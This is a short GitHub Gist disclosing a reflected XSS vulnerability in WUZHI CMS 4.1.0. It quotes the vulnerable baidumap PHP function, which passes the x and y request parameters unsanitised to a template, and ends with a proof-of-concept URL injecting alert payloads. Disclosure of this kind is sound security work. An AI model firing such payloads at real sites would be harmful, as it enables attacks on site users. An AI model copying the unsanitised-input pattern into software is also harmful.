Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
wuzhicms v4.1.0 baidumap reflected xss vulnerability

A xss vulnerability was discovered in WUZHI CMS 4.1.0

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the x or y parameter of /index.php?m=core&f=map&v=baidumap

Vulnerability file: coreframe/app/core/map.php

    public function baidumap() {
        $map_x = isset($GLOBALS['x']) && !empty($GLOBALS['x']) ? $GLOBALS['x'] : 116;
        $map_y = isset($GLOBALS['y']) && !empty($GLOBALS['y']) ? $GLOBALS['y'] : 39;
        $map_zoom = isset($GLOBALS['zoom']) && !empty($GLOBALS['zoom']) ? $GLOBALS['zoom'] : 12;
        if(($map_x=='116' || $map_x=='0.000000') && !empty($GLOBALS['address'])) {
            $address = $GLOBALS['address'];
        } else {
            $address = '';
        }
        include T('map','baidumap');
    }

PoC:

http://example.com/index.php?m=core&f=map&v=baidumap&x=alert(1)&y=alert(2)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.